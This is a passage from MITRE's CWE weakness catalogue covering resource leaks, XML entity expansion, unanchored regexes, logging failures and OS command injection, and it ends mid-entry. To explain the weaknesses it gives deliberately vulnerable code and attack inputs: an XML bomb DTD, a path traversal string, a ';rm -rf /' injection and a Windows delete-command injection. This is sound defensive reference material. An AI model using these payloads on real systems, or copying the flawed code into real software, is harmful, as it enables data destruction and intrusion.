processes from accessing the same type of resource. - - - - - Operation - Architecture and Design - Resource Limitation - - Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. - When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. - Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). - - - - - - SFP13 - Unrestricted Consumption - - - - - - - - CWE Content Team - MITRE - 2009-05-13 - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Alternate_Terms, Relationships, Theoretical_Notes - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software does not release a file descriptor or handle after its effective lifetime has ended, i.e., after the file descriptor/handle is no longer needed. - When a file descriptor or handle is not released after use (typically by explicitly closing it), attackers can cause a denial of service by consuming all available file descriptors/handles, or otherwise preventing other system processes from obtaining their own file descriptors/handles. - - - - - - - - Implementation - - - - - Availability - DoS: Resource Consumption (Other) - An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource. - - - - - Operation - Architecture and Design - Resource Limitation - - Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. - When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. - Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). - - - - - - CVE-2007-0897 - Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897 - - - - - FIO42-C - Close files when they are no longer needed - CWE More Abstract - - - - - - - - CWE Content Team - MITRE - 2009-05-13 - - - CWE Content Team - MITRE - 2009-12-28 - updated Observed_Examples - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Common_Consequences, Relationships, Theoretical_Notes - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities. - If the DTD contains a large number of nested or recursive entities, this can lead to explosive growth of data when parsed, causing a denial of service. - - - - - - - - - - - XEE - XEE is the acronym commonly used for XML Entity Expansion. - - - Billion Laughs Attack - - - XML Bomb - While the "XML Bomb" term was used in the early years of knowledge of this issue, the XEE term seems to be more commonly used. - - - - - Implementation - - - Operation - - - Medium - - - Availability - DoS: Resource Consumption (Other) - If parsed, recursive entity references allow the attacker to expand data exponentially, quickly consuming all system resources. - - - - - Operation - If possible, prohibit the use of DTDs or use an XML parser that limits the expansion of recursive DTD entities. - - - Implementation - Before parsing XML files with associated DTDs, scan for recursive entity declarations and do not continue parsing potentially explosive content. - - - - - The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected. - - <?xml version="1.0"?><!DOCTYPE MaliciousDTD [<!ENTITY ZERO "A"><!ENTITY ONE "&ZERO;&ZERO;"><!ENTITY TWO "&ONE;&ONE;">...<!ENTITY THIRTYTWO "&THIRTYONE;&THIRTYONE;">]><data>&THIRTYTWO;</data> - - - - - - CVE-2008-3281 - XEE in XML-parsing library. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281 - - - CVE-2011-3288 - XML bomb / XEE in enterprise communication product. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3288 - - - CVE-2011-1755 - "Billion laughs" attack in XMPP server daemon. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1755 - - - CVE-2009-1955 - XML bomb in web server module - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955 - - - CVE-2003-1564 - Parsing library allows XML bomb - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1564 - - - - - 44 - XML Entity Expansion - - - - - - - - - - - - - - CWE Content Team - MITRE - 2009-06-30 - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, References - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - Unrestricted Recursive Entity References in DTDs ('XML Bomb') - - - - The software uses a regular expression to perform neutralization, but the regular expression is not anchored and may allow malicious or malformed data to slip through. - When performing tasks such as validating against a set of allowed inputs (allowlist), data is examined and possibly modified to ensure that it is well-formed and adheres to a list of safe values. If the regular expression is not anchored, malicious or malformed data may be included before or after any string matching the regular expression. The type of malicious data that is allowed will depend on the context of the application and which anchors are omitted from the regular expression. - - - - - Regular expressions are typically used to match a pattern of text. Anchors are used in regular expressions to specify where the pattern should match: at the beginning, the end, or both (the whole input). - - - - Implementation - - - Medium - - - Availability - Confidentiality - Access Control - Bypass Protection Mechanism - An unanchored regular expression in the context of an allowlist will possibly result in a protection mechanism failure, allowing malicious or malformed data to enter trusted regions of the program. The specific consequences will depend on what functionality the allowlist was protecting. - - - - - Implementation - Be sure to understand both what will be matched and what will not be matched by a regular expression. Anchoring the ends of the expression will allow the programmer to define an allowlist strictly limited to what is matched by the text in the regular expression. If you are using a package that only matches one line by default, ensure that you can match multi-line inputs if necessary. - - - - - Consider a web application that supports multiple languages. It selects messages for an appropriate language by using the lang parameter. - - $dir = "/home/cwe/languages";$lang = $_GET['lang'];if (preg_match("/[A-Za-z0-9]+/", $lang)) {include("$dir/$lang");}else {echo "You shall not pass!\n";} - - The previous code attempts to match only alphanumeric values so that language values such as "english" and "french" are valid while also protecting against path traversal, CWE-22. However, the regular expression anchors are omitted, so any text containing at least one alphanumeric character will now pass the validation step. For example, the attack string below will match the regular expression. - - ../../etc/passwd - - If the attacker can inject code sequences into a file, such as the web server's HTTP request log, then the attacker may be able to redirect the lang parameter to the log file and execute arbitrary code. - - - - - CWE Content Team - MITRE - 2009-06-30 - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences, Description, Potential_Mitigations - - - - - When a security-critical event occurs, the software either does not record the event or omits important details about the event when logging it. - When security-critical events are not logged properly, such as a failed login attempt, this can make malicious behavior more difficult to detect and may hinder forensic analysis after an attack succeeds. - - - - - - - - - - Operation - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Medium - - - Non-Repudiation - Hide Activities - If security critical information is not recorded, there will be no trail for forensic analysis and discovering the cause of problems or the source of attacks may become more difficult or impossible. - - - - - Architecture and Design - Use a centralized logging mechanism that supports multiple levels of detail. Ensure that all security-related successes and failures can be logged. - - - Operation - Be sure to set the level of logging appropriately in a production environment. Sufficient data should be logged to enable system administrators to detect attacks, diagnose errors, and recover from attacks. At the same time, logging too much data (CWE-779) can cause the same problems. - - - - - The example below shows a configuration for the service security audit feature in the Windows Communication Foundation (WCF). - - <system.serviceModel><behaviors><serviceBehaviors><behavior name="NewBehavior"><serviceSecurityAudit auditLogLocation="Default"suppressAuditFailure="false"serviceAuthorizationAuditLevel="None"messageAuthenticationAuditLevel="None" /> - ... - - - </system.serviceModel> - - The previous configuration file has effectively disabled the recording of security-critical events, which would force the administrator to look to other sources during debug or recovery efforts. - Logging failed authentication attempts can warn administrators of potential brute force attacks. Similarly, logging successful authentication events can provide a useful audit trail when a legitimate account is compromised. The following configuration shows appropriate settings, assuming that the site does not have excessive traffic, which could fill the logs if there are a large number of success or failure events (CWE-779). - - <system.serviceModel><behaviors><serviceBehaviors><behavior name="NewBehavior"><serviceSecurityAudit auditLogLocation="Default"suppressAuditFailure="false"serviceAuthorizationAuditLevel="SuccessAndFailure"messageAuthenticationAuditLevel="SuccessAndFailure" /> - ... - - - </system.serviceModel> - - - - - - CVE-2008-4315 - server does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4315 - - - CVE-2008-1203 - admin interface does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1203 - - - CVE-2007-3730 - default configuration for POP server does not log source IP or username for login attempts - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3730 - - - CVE-2007-1225 - proxy does not log requests without "http://" in the URL, allowing web surfers to access restricted web content without detection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1225 - - - CVE-2003-1566 - web server does not log requests for a non-standard request type - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1566 - - - - - - - - CWE Content Team - MITRE - 2009-07-02 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - Fortify Software - 2009-07-02 - Provided code example and additional information for description and consequences. - - - - - The software logs too much information, making log files hard to process and possibly hindering recovery efforts or forensic analysis after an attack. - While logging is a good practice in general, and very high levels of logging are appropriate for debugging stages of development, too much logging in a production environment might hinder a system administrator's ability to detect anomalous conditions. This can provide cover for an attacker while attempting to penetrate a system, clutter the audit trail for forensic analysis, or make it more difficult to debug problems in a production environment. - - - - - - - - - Operation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Low - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Other) - Log files can become so large that they consume excessive resources, such as disk and CPU, which can hinder the performance of the system. - - - Non-Repudiation - Hide Activities - Logging too much information can make the log files of less use to forensics analysts and developers when trying to diagnose a problem or recover from an attack. - - - Non-Repudiation - Hide Activities - If system administrators are unable to effectively process log files, attempted attacks may go undetected, possibly leading to eventual system compromise. - - - - - Architecture and Design - Suppress large numbers of duplicate log messages and replace them with periodic summaries. For example, syslog may include an entry that states "last message repeated X times" when recording repeated events. - - - Architecture and Design - Support a maximum size for the log file that can be controlled by the administrator. If the maximum size is reached, the admin should be notified. Also, consider reducing functionality of the software. This may result in a denial-of-service to legitimate software users, but it will prevent the software from adversely impacting the entire system. - - - Implementation - Adjust configurations appropriately when software is transitioned from a debug state to production. - - - - - CVE-2007-0421 - server records a large amount of data to the server log when it receives malformed headers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0421 - - - CVE-2002-1154 - chain: application does not restrict access to front-end for updates, which allows attacker to fill the error log - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1154 - - - - - CWE Content Team - MITRE - 2009-07-02 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. - - This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage. - There are at least two subtypes of OS command injection: - - - The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system("nslookup [HOSTNAME]") to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing. - The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use "exec([COMMAND])" to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line. - - - From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input. - - - - - - - - - - - - - - Shell injection - - - Shell metacharacters - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Confidentiality - Integrity - Availability - Non-Repudiation - Execute Unauthorized Code or Commands - DoS: Crash, Exit, or Restart - Read Files or Directories - Modify Files or Directories - Read Application Data - Modify Application Data - Hide Activities - Attackers could execute unauthorized commands, which could then be used to disable the software, or read and modify data for which the attacker does not have permissions to access directly. Since the targeted application is directly executing the commands instead of the attacker, any malicious activities may appear to come from the application or the application's owner. - - - - - Automated Static Analysis - - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. - Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke OS commands, leading to false negatives - especially if the API/library code is not available for analysis. - - This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Moderate - - - Manual Static Analysis - Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints. - High - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - If at all possible, use library calls rather than external processes to recreate the desired functionality. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - Architecture and Design - Attack Surface Reduction - For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session's state instead of sending it out to the client in a hidden form field. - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error. - - - - Implementation - Output Encoding - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - - - Implementation - If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line. - - - Architecture and Design - Parameterization - - If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. - Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments. - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When constructing OS command strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping. - Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like ";" and ">" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components. - Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address. - - - - Architecture and Design - Enforcement by Conversion - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - - - Operation - Compilation or Build Hardening - Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184). - - - Operation - Environment Hardening - Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184). - - - Implementation - - Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. - If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. - Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. - In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used. - - - - Operation - Sandbox or Jail - Use runtime policy enforcement to create an allowlist of allowable commands, then prevent use of any command that does not appear in the allowlist. Technologies such as AppArmor are available to do this. - - - Operation - Firewall - Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. - Moderate - An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Operation - Implementation - Environment Hardening - When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. - - - - - This example code intends to take the name of a user and list the contents of that user's home directory. It is subject to the first variant of OS command injection. - - $userName = $_POST["user"];$command = 'ls -l /home/' . $userName;system($command); - - The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as: - - ;rm -rf / - - Which would result in $command being: - - ls -l /home/;rm -rf / - - Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system. - Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks. - - - This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection. - - use CGI qw(:standard);$name = param('name');$nslookup = "/path/to/nslookup";print header;if (open($fh, "$nslookup $name|")) {while (<$fh>) {print escapeHTML($_);print "<br>\n";}close($fh);} - - Suppose an attacker provides a domain name like this: - - cwe.mitre.org%20%3B%20/bin/ls%20-l - - The "%3B" sequence decodes to the ";" character, and the %20 decodes to a space. The open() statement would then process a string like this: - - /path/to/nslookup cwe.mitre.org ; /bin/ls -l - - As a result, the attacker executes the "/bin/ls -l" command and gets a list of all the files in the program's working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server. - - - The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection. - - String script = System.getProperty("SCRIPTNAME");if (script != null)System.exec(script); - - - If an attacker has control over this property, then they could modify the property to point to a dangerous program. - - - In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through a HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates. - - public String coordinateTransformLatLonToUTM(String coordinates){ - String utmCoords = null;try { - String latlonCoords = coordinates;Runtime rt = Runtime.getRuntime();Process exec = rt.exec("cmd.exe /C latlon2utm.exe -" + latlonCoords); - // process results of coordinate transform - - - // ... - - - }catch(Exception e) {...}return utmCoords; - } - - However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending '&' followed by the command for another program to the end of the coordinate string. The '&' instructs the Windows operating system to execute another program. - - - The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user. - - ...String btype = request.getParameter("backuptype");String cmd = new String("cmd.exe /K \"c:\\util\\rmanDB.bat "+btype+"&&c:\\utl\\cleanup.bat\"") - System.Runtime.getRuntime().exec(cmd);... - - The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well. - - - - - CVE-1999-0067 - Canonical example of OS command injection. CGI program does not neutralize "|" metacharacter when invoking a phonebook program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067 - - - CVE-2001-1246 - Language interpreter's mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246 - - - CVE-2002-0061 - Web server allows command execution using "|" (pipe) character. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0061 - - - CVE-2003-0041 - FTP client does not filter "|" from filenames returned by the server, allowing for OS command injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0041 - - - CVE-2008-2575 - Shell metacharacters in a filename in a ZIP archive - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2575 - - - CVE-2002-1898 - Shell metacharacters in a telnet:// link are not properly handled when the launching application processes the link. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1898 - - - CVE-2008-4304 - OS command injection through environment variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4304 - - - CVE-2008-4796 - OS command injection through https:// URLs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4796 - - - CVE-2007-3572 - Chain: incomplete denylist for OS command injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3572 - - - CVE-2012-1988 - Product allows remote users to execute arbitrary commands by creating a file whose pathname contains shell metacharacters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1988 - - - - Program Invocation - - - System Process - - - - OS Command Injection - - - A3 - Malicious File Execution - CWE More Specific - - - A6 - Injection Flaws - CWE More Specific - - - ENV03-C - Sanitize the environment when invoking external programs - - - ENV33-C - Do not call system() - CWE More Specific - - - STR02-C - Sanitize data passed to complex subsystems - - - 31 - OS Commanding - - - IDS07-J - Do not pass untrusted, unsanitized data to the Runtime.exec() method - - - SFP24 - Tainted input to command - - - ASCSM-CWE-78 - - - - - - - - - - - - - - - - - - - - - - - - The "OS command injection" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an "-exec" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the 